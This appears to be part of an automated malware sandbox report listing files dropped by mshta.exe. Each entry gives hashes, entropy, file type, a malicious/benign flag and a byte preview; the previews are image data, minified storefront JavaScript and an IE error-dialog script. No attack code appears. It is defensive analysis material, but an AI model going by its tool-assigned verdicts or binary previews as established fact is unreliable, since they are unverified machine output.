                                                                                                                                                                                                                                SHA-512:F88CC4F15D0F72CB0081BABEADEE1043908F189FEC30283834713BBE8C7EE47E9006FD2F93AC0F2835CD23557E107C3D24CBFF1D2636798B742FFA974C55347E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......D.............pHYs............... .IDATx....Z....s.n.{.s...WYI&..T.E#.RBEIH...P.<....p......$$D..%.((A!T..YYYPM..9{..Fc{...#.bEcG8.....b........C.*........d.m....kU;..Xu.../...4..nk....6.....J.....n{..h^.>..S../...}....hz.V._.L..n.M..]..U..:..-...C.s.nw............;.........ek=.Y=T.M......r.ue....l*.....qs.~k.6..5..}......m....:.(...-..l.m%..~....y<.l.|L.{U1_.o"..V...#.F....u....X.8.OZ}.....p......Uv[.e..Z?.}.`..+...maW...e.).o.c.#.:t...:..C.v....q.....KM.|lq...x..hNm...3...6.rEX..M.u.y_..uG.Gjn...#...n...,sYM.3e.]..l.:J.e.s.mR.5a'.....*U.vu.)...sAS&{.....+.. ^&......F..^..6.$.Wo.8.>...2...;,d.O....;.P..stW.qp......j...M.r.v.......vj4.......l.3.*.Z...s..\=.....m.<....m".v]$l.i.R...u.(..<1w.m..{.z.XXm'.....eo..l{-.I.....|.C..S.U..~..b.an6'?wm..%t6.....2=u':t8#t.........O{...}p.u.....a[/...M........:~c.Q...N..|y....}...U[..Y.M.m:9.m.XE...K2M['d.a...v..[u......o............x..6..:..|L..F.ol.]p*.w......
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5854
                                                                                                                                                                                                                                Entropy (8bit):7.901948181603355
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:RSjPX8+VKezzzLAREPNMNq4KJCdAg5zHXsoV7WHi2eRZ3nHh/SLBQ7zwRDJxMysl:RSjf8+VUisvECdvtWHiLfZSd+8no9V
                                                                                                                                                                                                                                MD5:7E40D9EA5E05662F8CC9B805AA313AA9
                                                                                                                                                                                                                                SHA1:CAC32FCA85437248C7B5F3FBB26A8E7BC5B56AB8
                                                                                                                                                                                                                                SHA-256:F1DBC816B9FD576E3726CE5A10469D3760DD7328D63DA36D7F86E237A9A45EA9
                                                                                                                                                                                                                                SHA-512:ECEDA18809D84D6E9CD672BD54885BE3A3D3805F07908D37C00A693EE3A383B8F44F739203ADCA39D830137FE88CB82D1D7AD7D953F2E134C40D0DAC412ACE4C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...............).....pHYs.................IDATx...]l..a.....w..lZ...-Gn.a.I..Q......[..d ...J.".1.h......ABaQ.l...h+(..F.>.E.....".1).....N:.G.vw.p<."o.v.v.k.?@0.....3;;;.........................T..?L.0..H..-.LH .;...%[.'.... /j...m....it.*i...3...-!..L.a...D.....f.~S.=..I.k?..`..=,. -..l..7,....2.....2.r..M@...d.f.6..u&...@;&.q..&..k....|]....c.L..'..=.u.z..\N..Nt.y.ko........s.Dl...X..r.M.....1<......H......A.....Z..R..`.6....A@.]..x.;.=..... ...7"W..... ..6.1|F..~.HQ.D0.._;.-..9...p........1.D..+.5_./a....(..8...Wk.OMA_.4......$0Zk.....p..........#..x.6.).a..[hDu#...5.eP.....7......'..T".:{...z..w....bp..Kn7r.t_m..=...J...O;..U...d'.....U..8.y...Mv.&!.n..q.t_..<.t..!...X..d....FgmN.|....Q..FgmN....Ukt..D.K..eh...W5..8.K..(.......b.W.H.H.V$"..H.HVzG...|2.......Jo..t......Q.dq.B[.A_m.......O..J.w...l7"..#.-i..m.5..m~"j...v.U.F..m'j!..6.e..z}.%.Z..b...l.......aBs.t..v.V$.0T......3.57.l)..A...>'jA.5n.........S..........I..2.DmD..:.
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1240
                                                                                                                                                                                                                                Entropy (8bit):7.666665495805454
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:kRCbB11eUI1nSHQ04cK3MSURcUOlqEDJwVvzAG8UIuGVwKUuNpRpetXqmoln:tzI1QQCVfZOlaZzSfVLUupp+qP
                                                                                                                                                                                                                                MD5:DCCAC99B0BC3D155B1971690CB88390E
                                                                                                                                                                                                                                SHA1:EEB44FEE9F25A34B818156BE4E57E69EA8C2C9E8
                                                                                                                                                                                                                                SHA-256:07D0578A61AAFB082A4DF80CF26B886BEBCD26A761AA9D1ACCB95630F29572D7
                                                                                                                                                                                                                                SHA-512:758A161276F73F0FF707C77881FDD485E55EF998ACAF28160907F0DBD01FCD9717EA74DA5A0AFD0DEA21FF4236930FE04D66BE3B9F6377D4974A2525591C7F67
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:RIFF.N..WEBPVP8X...........'..VP8 .M......*..(....%.}.w.X6.._...a~....[..........?.?......+....".n...o.?.........'.....?..........o...O._...s...G.......;......?.}.}..j.....G.._....X...;.'...g.......o..._.?....E.........w._......C.......................O.7...~....M.......O..._.......k..W?.6...G......].....+......%.s..|7...o.o.O.......................?!..}.......?........w.O...?..@}^................{......K./.....>.?..-.o..........-..........._..||......O..........%...........>.}.~.{3~..%..<..+.$..I5V....Li.L.6.H..h.cl...G"3.&.g.)..U.E..y..:.....(.a....,>.K}...<...keqg.C$.X7.tJ3+f\kh'.L..[.p.U.b...|....v.....aN..v......):+...*..LJ......,9P(........Y..M3g.coX'V......L.U..D%.;.....t..{...b.T..d.W.9.e..NZ-.O.,.H.os..R1n1B....)..;k..1'..l.JS.U...N.T.......L.6.JiU.i.....v....'$.m.T.p.WX...d.`....5.s..@..}.i..M. .Q.1.qJ.....mbd..v....p.<d...x.@......}J4.!....>.\H..^.5.e..9b<..m.+....A..]..:MF...p.A.b..Fs5V..].Q.{.....!....>.S......w..3cB...^..U..A.4.H..'
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):290605
                                                                                                                                                                                                                                Entropy (8bit):7.995159121043485
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:6144:YFC6Qj/std8oisE2bbxulMwlzoPGo9I4YdYgif5bDlM+kyHhJBMDKA:36msti8bxulMwlEPj/tSaBJBsKA
                                                                                                                                                                                                                                MD5:2283059A30B7D44599CEA2C3F7A730C0
                                                                                                                                                                                                                                SHA1:721D117512A481E70B67BE88A348672A6208E750
                                                                                                                                                                                                                                SHA-256:17E74B21E1BAB0DCE4CA89037EEE9ED84DD704B57D68FEF666EFDF0EE4A8A2ED
                                                                                                                                                                                                                                SHA-512:1EB454BE7E8785E5BC85A2E1C6957E72F9CC6B2959FA24EBD179849959EBB1EB7FD3D53CE92AAE95DFB7D299CB4D25114D1EC7E85DE6110DA8972565585236E1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..Y.5.Y..{..{O.~.o:.....@..d..(.....B!8....v..k%w^N.r....|./'.W..^6.A..@.AH...#..#.oz.=uwU....=..{......v..Tu.P..?...x..(..f.j...4..{4.b~......*3../..0..y......+.h.bv.w......b.......Yn.N.gr.q..9,7....9.9..-w.1......}..2..{..V.M,r.Xo......Z..x..t.F.X.n...B..~v;:...u.-.V.t{.v..Z..ii...K.......m.w......vM.{r}n._..9.M.7}."..a.~.Xt.O...L3..E.....Y..'.Q....t:..6.T.D.M..jF.....q.W..18:._.].p..lX......u..>...l.6...WB...X(QbQ$P.p%J...u.c.g..?...8tV(.3......c2a.......i.4[.}~\'...?.....A.o.L...c.H.....8.tzy.L.w..[..w...n.ir.N..W;.....\..n..z@X.](...Nj.m..+.@....%J.(............l.e?/.m..*..b.]..iu'........B....id..a;..<...../..m..}..O.U<.fbqe.j..w.e..1o>).(.[.,.9).&.b.`..;....N.n.....?.....|<Fo.%J......'j%...u..b.t.....y9.lM$.|:.......F[>KQ.... kY..B=...lNo.Zm....<.9]=.J....em[......U.-{R,.O.:..h.g]l6.$.^.:.......0.....K.m`...u.e .~.(Qb>$....(.v.R.\g..."fM.F..A_..iF!l...g.m..
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):275314
                                                                                                                                                                                                                                Entropy (8bit):7.994983258699055
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:6144:k9ccbU3487K+ZcBqm8Q5HuURofVmp13XSksw8Q+jZ:ASD2se5H/DdXSZQGZ
                                                                                                                                                                                                                                MD5:35AD7F987464144885786524DE1D9129
                                                                                                                                                                                                                                SHA1:19CF119199C7B84F48761CCB5F1E9E1402D8A2F3
                                                                                                                                                                                                                                SHA-256:19E919A123ABA9C62FD7785C3C234918412CE6C43836F36A355D648C9D3BF56C
                                                                                                                                                                                                                                SHA-512:2D4DEE3EBD2218E2AD1D154F88924750980EFACD16908D7E40EEE630FA0154C5D64A401C1D6A5D316F780A3FC1EB9A3D03B794B1F8F000BEE1D719BA45C165D4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..W..H....w.!S}.TwuW.....l.9c.\..y.....o..4.F#.\...iU....'R...~x.@.22t D..o.W..pq\....=~.....`.CX..i..&..h...|..1.WfX:.,.|z9..E.-s..g2..r.UmZ....S..q.=....]....g.zsv.=..O...a.y.../..}.l...|Q..._...*e~.....F..m9.>....#.>.....~..o.v.Ci...%......]%..z......y./j.}>....)..l.....d....c...\......V/..E}1.....~.t.?..e.[..,.'.|..\\v<u.......p.....$.<.b.r...n.i..*.H.y...,(ay.q.t...i...........a..../...W.;b{8...G...b...}...u.............L...qH..Y...^...oV[...Fc9.B.......E..2.g..i.,.*{....}.!.......tL.i..1......U.*..}..V.....>..D.....n........!|a.cC.j.M...........n.3.#.8.q..W.......P.?e.....5.6...Ou...^....6....k........L_OO#.>.o.X.{x....jW.j_.?g..&.k....n.tu......IQ'q.....l.!......1,.J.I..is..}.r..q...#.......x...8.v=...!..............[.n./.u.[&[.HQVG.oK....".1...8......\.3...c...L.Y.mY&y..|5..U...._..U.i...n.x./zh-re^.....v.q...zw.f....O.Oy.y..G..n.....q|./.]..V.......6<6....N
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7456
                                                                                                                                                                                                                                Entropy (8bit):7.9364889784505035
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:yr5aJvx9ko4RKsfCROnLFMK814marB8uoYFEuTaHkC/DNBjyVF3m80+OqWvzm0u5:k5WvxcCccarj7azDNBjuW8pWbSJBV
                                                                                                                                                                                                                                MD5:D048A76DFA222B1986B9DD15B25E7B3F
                                                                                                                                                                                                                                SHA1:C165B8B9F8BF2FDB2B497EF4DF9ACF934A2C0545
                                                                                                                                                                                                                                SHA-256:6A04E2C4B68C3058EDC01BE813A02C94591A7C4BDF2ACB91E3D42A30CF34DD19
                                                                                                                                                                                                                                SHA-512:869325911F17E20CFFC00499A981FE348A040779A29C281450E6F1C0DD3EAE8D2E4BB393A334D881234D7CFA864DF7CDCF5C4986CEC20EE441299AF99AA72746
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8X..............ALPH.......m..6./....L.>.03me..`.C..i.3..S..#.h_.._.\z......sj../.vUn_....|...O.Vx..m...F!;.2......H:W.K..t.U.+...9n..:.d..V.._m......F..s..9.q..biA.d(.R%......^....,"...-..sH....c..1.4v..z..5...2.RCF.4%3..e....1.8...oXq.... )...K.tp.;..c..1........J...&.s.. NA]y..<=~..:."RKL,.C] v...b.../$.X..H..;G...:.>..DF...y....i..Ev.......p...9.s......?.........;p{h.D........S....D..5.....U*..V..|..,B.XM.....ec.#..Zbb.G.O:...CA......&}..J..>...%2.............E$c..'.%.}...p%.NP1.R..9L#3K5d.22w..!2..p.0.H.Ge\&.qL......"w]dM.....%.X.....H....n_....M..F1.z)...U...&Q.*]..n.K.$v5..l....%{F.....S...x..)...BF...S..x9.{bgNv.^..ksd..^.VP8 .....U...*.......%....D $.:.@.*|........./.g..k?`?...U.b...O......~G.........k.g.......w......_......|.p?.?..I.....s......._.O.oa.@?...~...?....)...]...3..._.?....@.Q.......A.I......../.].}..s.{.G....7.7....l?.....~.........................Z.....S.W.......?..;.u....~.s{....[.......O..#...T...........~....
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):10836
                                                                                                                                                                                                                                Entropy (8bit):7.941641697152749
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:RSH0mmAUpiIIBfhWBIY5JD9IxWPis80Rkg177fKZ4Sp8iDbSflzz:4v89SEmY70Cis8Ykg177fKZ488Rflf
                                                                                                                                                                                                                                MD5:35C5E3637BC80D5B2F849895E2902760
                                                                                                                                                                                                                                SHA1:565B695B238CFAE8C775C2A7F120E26EC4F7C04A
                                                                                                                                                                                                                                SHA-256:4DDD7144A88F4658A3C49D7D50FBB4D2DF755672AED3109AAC01243329213E30
                                                                                                                                                                                                                                SHA-512:03FC90B01A07FC9259BB8B657BB16949864E544B66EC7ABBF7AF779E573223480E668E947A4E783A1A54EEA3E19D4B960CA7D0BF9F049BFBFD5D0652CC7C0A26
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.PNG........IHDR...............).....pHYs............... .IDATx...w..U........I.$'...D...9+..E..5cv.,k\.*F....]..."(..(Q.1.$OwW....`z...:M.L.>......8OW......!D.f..B...Q.$.B......@..D....Q.$.B...... T....'...BdP.='...A.3&...............@q.*'.F....+...`Y..7._..+7.K,...^...~.^H.E....K...Xn.......T`..7..U...9.uo...N)...U.b.9....W....z...p.0..j.Du......@.2.-..\....g.....DB../.s!{..o.,..T........y..E...=...b.,TZ.*.......@.J*S.|..'._.d#...00..3J.,.%DU..'....J.d3.m.O....xB..p%.)Nf."[A?....3K........q.L.].......>...]}`.N.2.$*.A7......eB....,..:a..^........Q.N..TF..g".&..pL..%.....l.}eO7......t+".pu,N...8.n.o..."..S.;.9A:A?..&.......\JR.z..I.u]..p2.%..S.z...vuR)P...:8.....V.G...!....m,)....pY...!2.R....L....2.[G....'...L.GRIcg......d A..,...S3!DF..:.[.oHu.s....o..L..P.......B.+.0.%H....].!D6.Q_A.~a.u.BdQ.&.z.d:(!..$..(..3W.!D..f./..8>.u.Bd....2..z..%.....5..k._...|]..Yt........!..3.^A7....."K..1..+..UG....x.@...^...".\..{.=.y...9...E....bE......E....^=..
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (23795)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):23885
                                                                                                                                                                                                                                Entropy (8bit):5.252757997314533
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:hHwxKC+QrwxKCpC13RQwxKC+O5b4NBOlgpEluE/7jAF+/fjfMSRNgFA2:S3RT6OlxB7UufjfMcgFA2
                                                                                                                                                                                                                                MD5:C45F83F1265DAEF65E56C045188B74CA
                                                                                                                                                                                                                                SHA1:9AFDF2480B43511C16FF1B9404C14050A9F8B338
                                                                                                                                                                                                                                SHA-256:9BC48DD79AF31E65C5BB78352BD99651F2DA6E21365424E2EB9F8D72A741A0D8
                                                                                                                                                                                                                                SHA-512:1C1E5A0A210B232196464008048464EED79C05DB607D9B7406B7340347F29867FD2ACD1483CA9188A289F9CAE21F9B66958E008CDBF04454A7ED9A96C1663340
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[2941,9056,2256],{25051:e=>{var n={kind:"Document",definitions:[{kind:"OperationDefinition",operation:"query",name:{kind:"Name",value:"PageFromCache"},variableDefinitions:[{kind:"VariableDefinition",variable:{kind:"Variable",name:{kind:"Name",value:"path"}},type:{kind:"NamedType",name:{kind:"Name",value:"String"}},directives:[]},{kind:"VariableDefinition",variable:{kind:"Variable",name:{kind:"Name",value:"area"}},type:{kind:"NamedType",name:{kind:"Name",value:"String"}},directives:[]}],directives:[],selectionSet:{kind:"SelectionSet",selections:[{kind:"Field",name:{kind:"Name",value:"page"},arguments:[{kind:"Argument",name:{kind:"Name",value:"path"},value:{kind:"Variable",name:{kind:"Name",value:"path"}}}],directives:[],selectionSet:{kind:"SelectionSet",selections:[{kind:"Field",name:{kind:"Name",value:"components"},arguments:[],directives:[]},{kind:"Field",name:{kind:"Name",value:"template"},arguments:[],direct
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (374)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):467
                                                                                                                                                                                                                                Entropy (8bit):5.626643783338183
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:+px/hRFVGywjr8Tuq8hvhFcaFyvz+ULEr2HK:cnRF4ywPBq8hDc0yvzPoyq
                                                                                                                                                                                                                                MD5:8F5653EE7C8EE74F0D4DF359343936D1
                                                                                                                                                                                                                                SHA1:897F35A7BAB39B76FBC7519960DF0A72D94C7E43
                                                                                                                                                                                                                                SHA-256:6A4C45C194639AD7CA5F4F283619E0841298BBA4D976B072DBAA7DB6388F3637
                                                                                                                                                                                                                                SHA-512:B65A16AD929C88E73F6DEB12FFE52398BF0F65DBAD01465F1E6E5CBB2DB023397E09BF8D12EC5DEFA2294B8F09CB8EC0514F2D6CEAD06572C7C65E5824C50949
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[6265],{50859:(o,t,n)=>{n.r(t),n.d(t,{default:()=>e});const e=(0,n(56875).vJ)(["body{color:#666;background:#f1f1f1;font-family:",";-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;}a{text-decoration:none;color:#666;}"],(function(o){return o.theme.fontFamily}))}}]);.//# sourceMappingURL=catalogo-ui-americanas-desktop-global-style.eee763bba4c682851831.js.map
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3278)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3363
                                                                                                                                                                                                                                Entropy (8bit):5.420736130767279
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:bG3okoZBVdsCxukqxcyjZ0YnB5pT3tH2yJaD27FKIMiFiTVMjEI:bGSa4unxcIZ0YB5pT9WeaaMIMQEI
                                                                                                                                                                                                                                MD5:AF7E27FEE65430174E7F1C7D66D9D91C
                                                                                                                                                                                                                                SHA1:8C120018222DF279E26EC10B69E30E1B532BC5BE
                                                                                                                                                                                                                                SHA-256:9E13CD8C4BD0A9B569D3DFEAA43C95E0C8E61F3D7F31BFCE269ED2895FA395E7
                                                                                                                                                                                                                                SHA-512:9E0A24C473BA5234BDE1B9014630972BAD4B16CA5AFC0D2696678F24225F310F69659864024EA45025CE5F988E0D87D27B1068BB0B08CAD404527BD8ABDB3877
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[4736],{42309:(n,t,r)=>{r.d(t,{J:()=>m,r:()=>c});var e=r(8821),i=r(85169),o=r(82248),a=r(46647),s=r(32735),u=r(56875),p=s.createElement,c=function(n){(0,o.Z)(r,n);var t=(0,a.Z)(r);function r(){return(0,e.Z)(this,r),t.apply(this,arguments)}return(0,i.Z)(r,[{key:"render",value:function(){return p(d,this.props)}}]),r}(s.Component),d=u.ZP.div.withConfig({displayName:"grid__StyledGrid",componentId:"sc-1man2hx-0"})(["flex:1;display:flex;justify-content:",";flex-wrap:wrap;"],(function(n){return n.justifyContent||"space-between"})),l=r(20011),f=s.createElement,m=function(n){(0,o.Z)(r,n);var t=(0,a.Z)(r);function r(){return(0,e.Z)(this,r),t.apply(this,arguments)}return(0,i.Z)(r,[{key:"render",value:function(){var n,t,r="theme-grid-col ".concat(null!==(n=null===this||void 0===this||null===(t=this.props)||void 0===t?void 0:t.className)&&void 0!==n?n:"").trim();return f(v,(0,l.Z)({},this.props,{className:r}))}
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1501)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1591
                                                                                                                                                                                                                                Entropy (8bit):5.586539109428292
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:c2nRFsRXtVDj8yAyIKWpmFbi6tzeMdeL5TNIFnFEZAMY8FHmnWoVBjVZ+VJrcrY2:/sDxD1ZcMdeLNNIFn5MYUGVVBjVIVJrw
                                                                                                                                                                                                                                MD5:616A4B04A8AF6EAD79163CDEC1057F69
                                                                                                                                                                                                                                SHA1:56FF9FFC261E7A6B3C32D10F941A90304CADA1DB
                                                                                                                                                                                                                                SHA-256:0E41983F2EC1B2441DE0FDF56337B7BF91F0F18B4A7E3A07FAD638CA6FA484E4
                                                                                                                                                                                                                                SHA-512:41D6B910438705CB934E386AFA9E0B5C7DC8E85BFC18A9F57A2FC47CBA91FCCF07D4F54B85931F48CEB6D74CB8E6858B661A9725650941D78D5C0C250ADC3379
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[1580],{78565:(t,e,i)=>{i.r(e),i.d(e,{default:()=>n});const n=i(24635).default},24635:(t,e,i)=>{i.r(e),i.d(e,{default:()=>c});var n=i(32735),o=i(56875),l=n.createElement,h=o.ZP.div.withConfig({displayName:"src__Wrapper",componentId:"sc-10z0zf3-0"})(["h1,h2,h3{","}"],(function(t){var e=t.theme,i=t.colorText;return(0,o.iv)(["margin-bottom:10px;text-transform:",";font-weight:bold;color:",";"],e.titleTransform,i||e.bgColor||e.grey.dark)})),s=o.ZP.h1.withConfig({displayName:"src__Title",componentId:"sc-10z0zf3-1"})(["font-size:22px;line-height:30px;@media (min-width:680px){font-size:28px;line-height:40px;}"]),d=o.ZP.h2.withConfig({displayName:"src__SessionTitle",componentId:"sc-10z0zf3-2"})(["font-size:18px;line-height:24px;@media (min-width:680px){font-size:26px;line-height:36px;}"]),r=o.ZP.h3.withConfig({displayName:"src__SubTitle",componentId:"sc-10z0zf3-3"})(["font-size:20px;line-height:24px;@media
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):342616
                                                                                                                                                                                                                                Entropy (8bit):7.997289238267219
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:6144:aV/b/zbZARUgDFTBSFSKHSohzjSa2XNzoHD6UOB9xS1m4AyaKn2QEyUYGT/ZB:aVTLbZWUgDFN0hHSa2XN4eUOTxS1j6KY
                                                                                                                                                                                                                                MD5:09A9359538C4023FA1AA96FE9ADD37CF
                                                                                                                                                                                                                                SHA1:140F70F523A32250E739B9911A6C0521D0B70E88
                                                                                                                                                                                                                                SHA-256:6CC5E70BA885C9E30D21E0FA642917E8D69B4C8E2DDD65D477AC9E0033F6859B
                                                                                                                                                                                                                                SHA-512:52C35173E3C10E79FC48314D894372E658AC04884721A219ACE472F00F464EC71C8FD0AFD336AEB9F1EE84F57487E56BE8707BCCA0EDDDD30EE7EDADA547B056
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx...-Ir....:.t..}.....|.D.,....0l..?.?.?.!.....Y.!..lB".drIq.....>.ow.GUf.C.#2+.N..}.,..@..GfdddfDdTd$....!.."..=..`..`.d.1.j.0..,....@.@..J..'bU..?....s.5..$.'..g....j..}Y...,...M...=64.7]SC@.4+.5."...n.p[......1`..Y.x...}..U.C...`q.A...r..........H[......cy..`'..g..fy.....C... ...X..X."4KB{.`.N.wm.{..]2.cP._.H_....NZ.._k.-..a.G.z.|.5.Y....c....;.m.5..cE...1.{S.7R>&...M.X<4@..+....@......N...L.j..8..M.4_o..Xp...87.r......x$fq..9.Mdv."..8...9.........V2...8.3c@.>...91~...V.zy....2.......7R.....!..ja...........;...|..;.:......9.-.[.6.hE.}.l..s..U.1..`.<.L.;._Jy5.t&.`I......p.p.w......].[._p.n<E.l.p<^G...z.?~..Q......F.=...i6..... .."A.V........t.,...O.....4(L..1.....(.ME..l...j...yM......x...6.....}=.m..$.!y.C.8........... .X..rP.J'vj..H..1B...a_p.....JXu......b...9.*.G.........<.p.....y"..o.......T..8V..8..ox..h....s...a....2.Sz......V......w.^...&]F./.....JY..q....<...G?.#.
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1706
                                                                                                                                                                                                                                Entropy (8bit):5.274543201400288
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
                                                                                                                                                                                                                                MD5:B9BEC45642FF7A2588DC6CB4131EA833
                                                                                                                                                                                                                                SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
                                                                                                                                                                                                                                SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
                                                                                                                                                                                                                                SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1296 x 324, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):262851
                                                                                                                                                                                                                                Entropy (8bit):7.996424490052967
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:6144:0PAKyLKGJ7b+cdyaXFIXvZRYFy7qd4czOXdy2wB:kXy+OFVXFe+FjdsXd9U
                                                                                                                                                                                                                                MD5:A367BF1879B82AED03ECFB1698095843
                                                                                                                                                                                                                                SHA1:255FE9100F9524BBFA9B4796CBB6AA1A48D03775
                                                                                                                                                                                                                                SHA-256:C637035554FC2485C53C7428D254C78E8AEA0854E0062C7EDD8218F47EB887A3
                                                                                                                                                                                                                                SHA-512:E6BD635C3FDA03AEF5E2B74629F7A92E98BBF24F3E4CDC821E52F52A9C5DF3C12D177A45237F2385CBD6F717A1DC03DD1B2FFBD495B711BC4AFB562C83EE8818
                                                                                                                                                                                                                                Malicious:true
